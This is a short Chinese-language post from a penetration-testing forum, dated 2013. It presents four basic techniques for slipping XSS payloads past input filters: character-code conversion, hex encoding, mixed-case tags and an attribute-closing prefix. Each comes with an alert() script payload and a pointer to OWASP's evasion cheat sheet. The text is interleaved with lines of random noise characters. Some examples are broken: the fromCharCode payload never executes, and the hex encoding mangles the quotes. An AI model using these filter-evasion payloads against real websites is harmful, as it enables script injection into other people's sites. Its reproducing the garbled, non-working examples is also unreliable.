中国网络渗透测试联盟
标题:
XSS 绕过技术
[打印本页]
作者:
admin
时间:
2013-2-14 00:10
标题:
XSS 绕过技术
四种超级基础的绕过方法。
, ~* b* _" N& U" F
1.转换为ASCII码
/ Q5 X0 |$ j. r' d( v! e P
例子:原脚本为<script>alert(‘I love F4ck’)</script >
$ ^6 i, K8 }: f& V! { J% R' m, ?
通过转换,变成:
$ E( s. K! _7 @2 G: L, {9 G
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
& ^% B& A6 T0 H$ ]
1 C, `4 @) I) r, o
2.转换为HEX(十六进制)
. S; X( b! W0 x# D, B$ u
例子:原脚本为<script>alert(‘I love F4ck’)</script>
6 I+ Y, } v) y9 }
通过转换,变成:
8 G8 L0 M$ [9 m% _# I* ~( i5 k
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
0 i9 s. Q! x4 d* c. j1 k+ r
/ a W8 {% r9 j! B8 I
3.转换脚本的大小写
x: v6 R+ x( a
例子:原脚本为<script>alert(‘I love F4ck’)</script>
) G2 A( Y) l3 Y2 B& ]
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
3 C2 \0 _& B/ g; k6 z( t
* a* V) a+ Q" W, g
4.增加闭合标记”>
5 R+ z9 h: ?9 T
例子:原脚本为<script>alert(‘I love F4ck’)</script>
6 o1 i: ~0 A. X* H& L" z0 ~; b# J
转换为:”><script>alert(‘I love F4ck’)</script>
6 e. {7 J: [' O( {: P" E
更详细绕过技术请参考此网页
* P: I$ |3 Q* V p
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
5 ]+ S0 q- ]6 o3 \. B8 Y
* U$ H. F& W7 i( o, x
转换工具使用的是火狐的 hackbar mozilla addon.
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2